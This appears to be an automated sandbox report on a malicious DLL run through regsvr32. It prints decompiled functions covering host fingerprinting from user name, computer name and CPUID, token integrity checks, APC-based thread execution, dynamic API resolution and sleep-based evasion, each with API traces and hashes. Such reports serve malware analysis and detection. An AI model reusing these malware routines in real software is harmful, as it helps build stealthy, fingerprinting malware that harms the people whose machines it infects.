                                                  				_push(_t15 + 0x5e505e);
                                                  				_push(_t15 + 0x5e5054);
                                                  				_push(0x16);
                                                  				_push( &_v60);
                                                  				_v12 = _t31;
                                                  				L005E20FA();
                                                  				_t18 = _a4;
                                                  				if(_t18 == 0) {
                                                  					_t18 = 0x1000;
                                                  				}
                                                  				_t19 = CreateFileMappingW(0xffffffff, 0x5e4140, 4, 0, _t18,  &_v60); // executed
                                                  				_t34 = _t19;
                                                  				if(_t34 == 0) {
                                                  					_t32 = GetLastError();
                                                  				} else {
                                                  					if(_a4 != 0 || GetLastError() == 0xb7) {
                                                  						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                                  						if(_t22 == 0) {
                                                  							_t32 = GetLastError();
                                                  							if(_t32 != 0) {
                                                  								goto L9;
                                                  							}
                                                  						} else {
                                                  							 *_a8 = _t34;
                                                  							 *_a12 = _t22;
                                                  							_t32 = 0;
                                                  						}
                                                  					} else {
                                                  						_t32 = 2;
                                                  						L9:
                                                  						CloseHandle(_t34);
                                                  					}
                                                  				}
                                                  				return _t32;
                                                  			}

                                                  APIs
                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 005E103C
                                                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 005E1052
                                                  • _snwprintf.NTDLL ref: 005E1077
                                                  • CreateFileMappingW.KERNELBASE(000000FF,005E4140,00000004,00000000,?,?), ref: 005E109C
                                                  • GetLastError.KERNEL32 ref: 005E10B3
                                                  • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 005E10C7
                                                  • GetLastError.KERNEL32 ref: 005E10DF
                                                  • CloseHandle.KERNEL32(00000000), ref: 005E10E8
                                                  • GetLastError.KERNEL32 ref: 005E10F0
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, Offset: 005E0000, based on PE: true
                                                  • Associated: 00000002.00000002.646415549.00000000005E5000.00000040.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_5e0000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                  • String ID:
                                                  • API String ID: 1724014008-0
                                                  • Opcode ID: 5ccd9dcf12fbfa28b426373054486903e2412c00fa50350e0a92939fe96745a5
                                                  • Instruction ID: 399ad72fb4b305aff7f61946482248bb46cf01bf87569f0e02466925717d5b4d
                                                  • Opcode Fuzzy Hash: 5ccd9dcf12fbfa28b426373054486903e2412c00fa50350e0a92939fe96745a5
                                                  • Instruction Fuzzy Hash: A021D6725001C4BFCB18EFA9DCCDEEE7BA9FB58350F104025F695DB150D6309A848B60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 74%
                                                  			E00C81B2F(intOrPtr __edx, void** _a4, void** _a8) {
                                                  				intOrPtr _v8;
                                                  				struct _FILETIME* _v12;
                                                  				short _v56;
                                                  				struct _FILETIME* _t12;
                                                  				intOrPtr _t13;
                                                  				void* _t17;
                                                  				void* _t21;
                                                  				intOrPtr _t27;
                                                  				long _t28;
                                                  				void* _t30;
                                                  
                                                  				_t27 = __edx;
                                                  				_t12 =  &_v12;
                                                  				GetSystemTimeAsFileTime(_t12);
                                                  				_push(0x192);
                                                  				_push(0x54d38000);
                                                  				_push(_v8);
                                                  				_push(_v12);
                                                  				L00C8B0C2();
                                                  				_push(_t12);
                                                  				_v12 = _t12;
                                                  				_t13 =  *0xc8d27c; // 0x41a5a8
                                                  				_t5 = _t13 + 0xc8e862; // 0x10a8e0a
                                                  				_t6 = _t13 + 0xc8e59c; // 0x530025
                                                  				_push(0x16);
                                                  				_push( &_v56);
                                                  				_v8 = _t27;
                                                  				L00C8AD5A();
                                                  				_t17 = CreateFileMappingW(0xffffffff, 0xc8d2a8, 4, 0, 0x1000,  &_v56); // executed
                                                  				_t30 = _t17;
                                                  				if(_t30 == 0) {
                                                  					_t28 = GetLastError();
                                                  				} else {
                                                  					if(GetLastError() == 0xb7) {
                                                  						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                  						if(_t21 == 0) {
                                                  							_t28 = GetLastError();
                                                  							if(_t28 != 0) {
                                                  								goto L6;
                                                  							}
                                                  						} else {
                                                  							 *_a4 = _t30;
                                                  							 *_a8 = _t21;
                                                  							_t28 = 0;
                                                  						}
                                                  					} else {
                                                  						_t28 = 2;
                                                  						L6:
                                                  						CloseHandle(_t30);
                                                  					}
                                                  				}
                                                  				return _t28;
			}

                                                  APIs
                                                  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00C822EA,?,?,4D283A53,?,?), ref: 00C81B3B
                                                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00C81B51
                                                  • _snwprintf.NTDLL ref: 00C81B76
                                                  • CreateFileMappingW.KERNELBASE(000000FF,00C8D2A8,00000004,00000000,00001000,?), ref: 00C81B92
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00C822EA,?,?,4D283A53), ref: 00C81BA4
                                                  • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00C81BBB
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00C822EA,?,?), ref: 00C81BDC
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00C822EA,?,?,4D283A53), ref: 00C81BE4
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
• Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
• Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                  • String ID:
                                                  • API String ID: 1814172918-0
                                                  • Opcode ID: 545739b529a8db846c9b9c69f6df48cd3b050620d133aae2eddc13abc0981592
                                                  • Instruction ID: 354cab7cf75ed19642a9ea2f8e6d3925ce0e2ee68ac6dc8d59a23c908daada63
                                                  • Opcode Fuzzy Hash: 545739b529a8db846c9b9c69f6df48cd3b050620d133aae2eddc13abc0981592
                                                  • Instruction Fuzzy Hash: 762102B2600204BBD721BBA4DC45FAE37BCAB48754F250161FA15E71E0E770AE058B68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 96%
                                                  			E00C8269C(char __eax, signed int* __esi) {
                                                  				long _v8;
                                                  				char _v12;
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				signed int _v28;
                                                  				long _t34;
                                                  				signed int _t39;
                                                  				long _t50;
                                                  				char _t59;
                                                  				intOrPtr _t61;
                                                  				void* _t62;
                                                  				void* _t63;
                                                  				signed int* _t64;
                                                  				char _t65;
                                                  				intOrPtr* _t67;
                                                  				void* _t68;
                                                  				signed int* _t69;
                                                  
                                                  				_t69 = __esi;
                                                  				_t65 = __eax;
                                                  				_v8 = 0;
                                                  				_v12 = __eax;
                                                  				if(__eax == 0) {
                                                  					_t59 =  *0xc8d270; // 0xd448b889
                                                  					_v12 = _t59;
                                                  				}
                                                  				_t64 = _t69;
                                                  				E00C86B43( &_v12, _t64);
                                                  				if(_t65 != 0) {
                                                  					 *_t69 =  *_t69 ^  *0xc8d278 ^ 0x4c0ca0ae;
                                                  				} else {
                                                  					GetUserNameW(0,  &_v8); // executed
                                                  					_t50 = _v8;
                                                  					if(_t50 != 0) {
                                                  						_t62 = RtlAllocateHeap( *0xc8d238, 0, _t50 + _t50);
                                                  						if(_t62 != 0) {
                                                  							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                  								_t63 = _t62;
                                                  								 *_t69 =  *_t69 ^ E00C82496(_v8 + _v8, _t63);
                                                  							}
                                                  							HeapFree( *0xc8d238, 0, _t62);
                                                  						}
                                                  					}
                                                  				}
                                                  				_t61 = __imp__;
                                                  				_v8 = _v8 & 0x00000000;
                                                  				GetComputerNameW(0,  &_v8);
                                                  				_t34 = _v8;
                                                  				if(_t34 != 0) {
                                                  					_t68 = RtlAllocateHeap( *0xc8d238, 0, _t34 + _t34);
                                                  					if(_t68 != 0) {
                                                  						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                  							_t63 = _t68;
                                                  							_t69[3] = _t69[3] ^ E00C82496(_v8 + _v8, _t63);
                                                  						}
                                                  						HeapFree( *0xc8d238, 0, _t68);
                                                  					}
                                                  				}
                                                  				asm("cpuid");
                                                  				_t67 =  &_v28;
                                                  				 *_t67 = 1;
                                                  				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                  				 *(_t67 + 8) = _t63;
                                                  				 *(_t67 + 0xc) = _t64;
                                                  				_t39 = _v16 ^ _v20 ^ _v28;
                                                  				_t69[1] = _t69[1] ^ _t39;
                                                  				return _t39;
			}

                                                  APIs
                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 00C826D3
                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 00C826EA
                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 00C826F7
                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00C823D9), ref: 00C82718
                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00C8273F
                                                  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00C82753
                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00C82760
                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00C823D9), ref: 00C8277E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
• Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
• Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: HeapName$AllocateComputerFreeUser
                                                  • String ID:
                                                  • API String ID: 3239747167-0
                                                  • Opcode ID: 6d8f133ec185d6063c00c0a0e512c690213e90400cc895bb817d5b4a50f32eed
                                                  • Instruction ID: f4fbc0b1b3c0ba1adf2a967a7fa898de2e02175d7aaf112e4ce5006e0dca2265
                                                  • Opcode Fuzzy Hash: 6d8f133ec185d6063c00c0a0e512c690213e90400cc895bb817d5b4a50f32eed
                                                  • Instruction Fuzzy Hash: D1310771A00205EFDB15EF69DC85B6EB7F9EB48354F204029E406D7260EB30EE419B29
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 100%
                                                  			E00C8924F(long* _a4) {
                                                  				long _v8;
                                                  				void* _v12;
                                                  				void _v16;
                                                  				long _v20;
                                                  				int _t33;
                                                  				void* _t46;
                                                  
                                                  				_v16 = 1;
                                                  				_v20 = 0x2000;
                                                  				if( *0xc8d25c > 5) {
                                                  					_v16 = 0;
                                                  					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                                  						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                                  						_v8 = 0;
                                                  						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                  						if(_v8 != 0) {
                                                  							_t46 = E00C82049(_v8);
                                                  							if(_t46 != 0) {
                                                  								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                  								if(_t33 != 0) {
                                                  									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                  								}
                                                  								E00C89039(_t46);
                                                  							}
                                                  						}
                                                  						CloseHandle(_v12);
                                                  					}
                                                  				}
                                                  				 *_a4 = _v20;
                                                  				return _v16;
			}

                                                  APIs
                                                  • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00C89281
                                                  • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 00C892A1
                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00C892B1
                                                  • CloseHandle.KERNEL32(00000000), ref: 00C89301
                                                    • Part of subcall function 00C82049: RtlAllocateHeap.NTDLL(00000000,00000000,00C87E50), ref: 00C82055
                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 00C892D4
                                                  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00C892DC
                                                  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00C892EC
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
• Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
• Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                  • String ID:
                                                  • API String ID: 1295030180-0
                                                  • Opcode ID: 3e6b3c900d8e7a757f597861c9123d9d8c0148f4924cd3a3eba1d7c5a5bacc1b
                                                  • Instruction ID: d2dd609e154c4d500f9e064a5233d0b0e411634fe228a590a8a27447e7d1a0db
                                                  • Opcode Fuzzy Hash: 3e6b3c900d8e7a757f597861c9123d9d8c0148f4924cd3a3eba1d7c5a5bacc1b
                                                  • Instruction Fuzzy Hash: E4213C7590021DFFEB11AF94DC84EFEBBB9EB48304F140065E911A61A1C7719F05EB64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • SysAllocString.OLEAUT32(?), ref: 00C81680
                                                  • IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 00C81702
                                                  • StrStrIW.SHLWAPI(?,006E0069), ref: 00C81741
                                                  • SysFreeString.OLEAUT32(?), ref: 00C81763
                                                    • Part of subcall function 00C852F9: SysAllocString.OLEAUT32(00C8C2B0), ref: 00C85349
                                                  • SafeArrayDestroy.OLEAUT32(?), ref: 00C817B7
                                                  • SysFreeString.OLEAUT32(?), ref: 00C817C5
                                                    • Part of subcall function 00C82436: Sleep.KERNELBASE(000001F4), ref: 00C8247E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
• Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
• Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                                  • String ID:
                                                  • API String ID: 2118684380-0
                                                  • Opcode ID: 13035416454bb859ea55a6a23a03e4b1463e9d26296e627dec391fc14545f66e
                                                  • Instruction ID: 8899200ed987aaa34069c185ee8031bfb795e7049927b70e35db32ef06fd0dd7
                                                  • Opcode Fuzzy Hash: 13035416454bb859ea55a6a23a03e4b1463e9d26296e627dec391fc14545f66e
                                                  • Instruction Fuzzy Hash: 92512375900209EFCB10EFE4C8849AEB7FAFF88344B19886DE915EB210D7719D46DB54
                                                  Uniqueness
                                                  • Uniqueness Score: -1.00%
                                                  Control-flow Graph
                                                  • Graph rendering omitted (basic blocks 5e1a0f-5e1af0, nodes marked Executed / Not Executed)
                                                  C-Code - Quality: 100%
                                                  			E005E1A0F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                  				intOrPtr _v8;
                                                  				_Unknown_base(*)()* _t29;
                                                  				_Unknown_base(*)()* _t33;
                                                  				_Unknown_base(*)()* _t36;
                                                  				_Unknown_base(*)()* _t39;
                                                  				_Unknown_base(*)()* _t42;
                                                  				intOrPtr _t46;
                                                  				struct HINSTANCE__* _t50;
                                                  				intOrPtr _t56;
                                                  
                                                  				_t56 = E005E1DE1(0x20);
                                                  				if(_t56 == 0) {
                                                  					_v8 = 8;
                                                  				} else {
                                                  					_t50 = GetModuleHandleA( *0x5e4150 + 0x5e5014);
                                                  					_v8 = 0x7f;
                                                  					_t29 = GetProcAddress(_t50,  *0x5e4150 + 0x5e5151);
                                                  					 *(_t56 + 0xc) = _t29;
                                                  					if(_t29 == 0) {
                                                  						L8:
                                                  						E005E1DFC(_t56);
                                                  					} else {
                                                  						_t33 = GetProcAddress(_t50,  *0x5e4150 + 0x5e5161);
                                                  						 *(_t56 + 0x10) = _t33;
                                                  						if(_t33 == 0) {
                                                  							goto L8;
                                                  						} else {
                                                  							_t36 = GetProcAddress(_t50,  *0x5e4150 + 0x5e5174);
                                                  							 *(_t56 + 0x14) = _t36;
                                                  							if(_t36 == 0) {
                                                  								goto L8;
                                                  							} else {
                                                  								_t39 = GetProcAddress(_t50,  *0x5e4150 + 0x5e5189);
                                                  								 *(_t56 + 0x18) = _t39;
                                                  								if(_t39 == 0) {
                                                  									goto L8;
                                                  								} else {
                                                  									_t42 = GetProcAddress(_t50,  *0x5e4150 + 0x5e519f);
                                                  									 *(_t56 + 0x1c) = _t42;
                                                  									if(_t42 == 0) {
                                                  										goto L8;
                                                  									} else {
                                                  										 *((intOrPtr*)(_t56 + 8)) = _a8;
                                                  										 *((intOrPtr*)(_t56 + 4)) = _a4;
                                                  										_t46 = E005E1EB5(_t56, _a12); // executed
                                                  										_v8 = _t46;
                                                  										if(_t46 != 0) {
                                                  											goto L8;
                                                  										} else {
                                                  											 *_a16 = _t56;
                                                  										}
                                                  									}
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				return _v8;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 005E1DE1: HeapAlloc.KERNEL32(00000000,?,005E1556,00000208,00000000,00000000,?,?,?,005E16A9,?), ref: 005E1DED
                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,005E1E4D,?,?,?,?,?,00000002,?,005E1401), ref: 005E1A33
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 005E1A55
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 005E1A6B
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 005E1A81
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 005E1A97
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 005E1AAD
                                                    • Part of subcall function 005E1EB5: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 005E1F12
                                                    • Part of subcall function 005E1EB5: memset.NTDLL ref: 005E1F34
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, Offset: 005E0000, based on PE: true
                                                  • Associated: 00000002.00000002.646415549.00000000005E5000.00000040.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_5e0000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                  • String ID:
                                                  • API String ID: 1632424568-0
                                                  • Opcode ID: 970e19efa35405d1462042481b37e74a35f72127670da5066b7c641d0411be37
                                                  • Instruction ID: 06d684121b9be5d25b474900287be389bf3857e98071023829dde1cbcbd274b1
                                                  • Opcode Fuzzy Hash: 970e19efa35405d1462042481b37e74a35f72127670da5066b7c641d0411be37
                                                  • Instruction Fuzzy Hash: 8B214DB1601A8A9FCB18DFAADC88E6A7BECFF143447004465E8C5CB211E734E905DFA5
                                                  Uniqueness
                                                  • Uniqueness Score: -1.00%
                                                  Control-flow Graph
                                                  • Graph rendering omitted (basic blocks 5e1afa-5e1bd3, nodes marked Executed / Not Executed)
                                                  C-Code - Quality: 86%
                                                  			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                                                  				long _v8;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* __ebp;
                                                  				char _t9;
                                                  				void* _t10;
                                                  				void* _t18;
                                                  				void* _t23;
                                                  				void* _t36;
                                                  
                                                  				_push(__ecx);
                                                  				_t9 = _a8;
                                                  				_v8 = 1;
                                                  				if(_t9 == 0) {
                                                  					_t10 = InterlockedDecrement(0x5e4108);
                                                  					__eflags = _t10;
                                                  					if(_t10 == 0) {
                                                  						__eflags =  *0x5e410c;
                                                  						if( *0x5e410c != 0) {
                                                  							_t36 = 0x2328;
                                                  							while(1) {
                                                  								SleepEx(0x64, 1);
                                                  								__eflags =  *0x5e4118;
                                                  								if( *0x5e4118 == 0) {
                                                  									break;
                                                  								}
                                                  								_t36 = _t36 - 0x64;
                                                  								__eflags = _t36;
                                                  								if(_t36 > 0) {
                                                  									continue;
                                                  								}
                                                  								break;
                                                  							}
                                                  							CloseHandle( *0x5e410c);
                                                  						}
                                                  						HeapDestroy( *0x5e4110);
                                                  					}
                                                  				} else {
                                                  					if(_t9 == 1 && InterlockedIncrement(0x5e4108) == 1) {
                                                  						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                                  						_t41 = _t18;
                                                  						 *0x5e4110 = _t18;
                                                  						if(_t18 == 0) {
                                                  							L6:
                                                  							_v8 = 0;
                                                  						} else {
                                                  							 *0x5e4130 = _a4;
                                                  							asm("lock xadd [eax], edi");
                                                  							_push( &_a8);
                                                  							_t23 = E005E12DC(E005E111A, E005E15EE(_a12, 1, 0x5e4118, _t41));
                                                  							 *0x5e410c = _t23;
                                                  							if(_t23 == 0) {
                                                  								asm("lock xadd [esi], eax");
                                                  								goto L6;
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				return _v8;
                                                  			}

                                                  APIs
                                                  • InterlockedIncrement.KERNEL32(005E4108), ref: 005E1B1C
                                                  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 005E1B31
                                                    • Part of subcall function 005E12DC: CreateThread.KERNEL32 ref: 005E12F3
                                                    • Part of subcall function 005E12DC: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 005E1308
                                                    • Part of subcall function 005E12DC: GetLastError.KERNEL32(00000000), ref: 005E1313
                                                    • Part of subcall function 005E12DC: TerminateThread.KERNEL32(00000000,00000000), ref: 005E131D
                                                    • Part of subcall function 005E12DC: CloseHandle.KERNEL32(00000000), ref: 005E1324
                                                    • Part of subcall function 005E12DC: SetLastError.KERNEL32(00000000), ref: 005E132D
                                                  • InterlockedDecrement.KERNEL32(005E4108), ref: 005E1B84
                                                  • SleepEx.KERNEL32(00000064,00000001), ref: 005E1B9E
                                                  • CloseHandle.KERNEL32 ref: 005E1BBA
                                                  • HeapDestroy.KERNEL32 ref: 005E1BC6
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, Offset: 005E0000, based on PE: true
                                                  • Associated: 00000002.00000002.646415549.00000000005E5000.00000040.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_5e0000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                  • String ID:
                                                  • API String ID: 2110400756-0
                                                  • Opcode ID: 5c04d9e8ecd5cd0edec8132d36de1a679b26edf15f1db80cc98802215abc8216
                                                  • Instruction ID: 2a22bc07c95360f79bb872d0c20d4b2d0b2bb9e944f96c13050ff4eac134f7e6
                                                  • Opcode Fuzzy Hash: 5c04d9e8ecd5cd0edec8132d36de1a679b26edf15f1db80cc98802215abc8216
                                                  • Instruction Fuzzy Hash: F121AE31A006C5ABCB1C9F6AECC9A297FA8FB703607544129F5C5DB150E7308E48DF54
                                                  Uniqueness
                                                  • Uniqueness Score: -1.00%
                                                  Control-flow Graph
                                                  • Graph rendering omitted
                                                  C-Code - Quality: 74%
                                                  			E00C86A56(void* __ecx, void* __edx, intOrPtr _a4) {
                                                  				struct _FILETIME _v12;
                                                  				void* _t10;
                                                  				void* _t12;
                                                  				int _t14;
                                                  				signed int _t16;
                                                  				void* _t18;
                                                  				signed int _t19;
                                                  				unsigned int _t23;
                                                  				void* _t26;
                                                  				signed int _t33;
                                                  
                                                  				_t26 = __edx;
                                                  				_push(__ecx);
                                                  				_push(__ecx);
                                                  				_t10 = HeapCreate(0, 0x400000, 0); // executed
                                                  				 *0xc8d238 = _t10;
                                                  				if(_t10 != 0) {
                                                  					 *0xc8d1a8 = GetTickCount();
                                                  					_t12 = E00C88F10(_a4);
                                                  					if(_t12 == 0) {
                                                  						do {
                                                  							GetSystemTimeAsFileTime( &_v12);
                                                  							_t14 = SwitchToThread();
                                                  							_t23 = _v12.dwHighDateTime;
                                                  							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
                                                  							_push(0);
                                                  							_push(9);
                                                  							_push(_t23 >> 7);
                                                  							_push(_t16);
                                                  							L00C8B226();
                                                  							_t33 = _t14 + _t16;
                                                  							_t18 = E00C87E03(_a4, _t33);
                                                  							_t19 = 2;
                                                  							_t25 = _t33;
                                                  							Sleep(_t19 << _t33); // executed
                                                  						} while (_t18 == 1);
                                                  						if(E00C86B96(_t25) != 0) {
                                                  							 *0xc8d260 = 1; // executed
                                                  						}
                                                  						_t12 = E00C8225B(_t26); // executed
                                                  					}
                                                  				} else {
                                                  					_t12 = 8;
                                                  				}
                                                  				return _t12;
                                                  			}

                                                  APIs
                                                  • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,00C8807D,?), ref: 00C86A69
                                                  • GetTickCount.KERNEL32 ref: 00C86A7D
                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,00C8807D,?), ref: 00C86A99
                                                  • SwitchToThread.KERNEL32(?,00000001,?,?,?,00C8807D,?), ref: 00C86A9F
                                                  • _aullrem.NTDLL(?,?,00000009,00000000), ref: 00C86ABC
                                                  • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,00C8807D,?), ref: 00C86AD6
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                  • String ID:
                                                  • API String ID: 507476733-0
                                                  • Opcode ID: 082ea9ae228da4a4822dc014112ae013f26f5e974cac045d6c69f56bf8450ec4
                                                  • Instruction ID: 94f64d2eef54527a608f097dde1444f799cd365047773ac5e770e4466cd19134
                                                  • Opcode Fuzzy Hash: 082ea9ae228da4a4822dc014112ae013f26f5e974cac045d6c69f56bf8450ec4
                                                  • Instruction Fuzzy Hash: 1211C672600200AFE714BB64EC4AB5E7798AB447A4F104529F505D61D0EBB0D900977D
                                                  Uniqueness
                                                  • Uniqueness Score: -1.00%
                                                  Control-flow Graph
                                                  • Graph rendering omitted (basic blocks 5e12dc-5e1337, nodes marked Executed / Not Executed)
                                                  C-Code - Quality: 100%
                                                  			E005E12DC(long _a4, DWORD* _a12) {
                                                  				_Unknown_base(*)()* _v0;
                                                  				void* _t4;
                                                  				long _t6;
                                                  				long _t11;
                                                  				void* _t13;
                                                  
                                                  				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x5e414c, 0, _a12); // executed
                                                  				_t13 = _t4;
                                                  				if(_t13 != 0) {
                                                  					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                                                  					if(_t6 == 0) {
                                                  						_t11 = GetLastError();
                                                  						TerminateThread(_t13, _t11);
                                                  						CloseHandle(_t13);
                                                  						_t13 = 0;
                                                  						SetLastError(_t11);
                                                  					}
                                                  				}
                                                  				return _t13;
                                                  			}

                                                  APIs
                                                  • CreateThread.KERNEL32 ref: 005E12F3
                                                  • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 005E1308
                                                  • GetLastError.KERNEL32(00000000), ref: 005E1313
                                                  • TerminateThread.KERNEL32(00000000,00000000), ref: 005E131D
                                                  • CloseHandle.KERNEL32(00000000), ref: 005E1324
                                                  • SetLastError.KERNEL32(00000000), ref: 005E132D
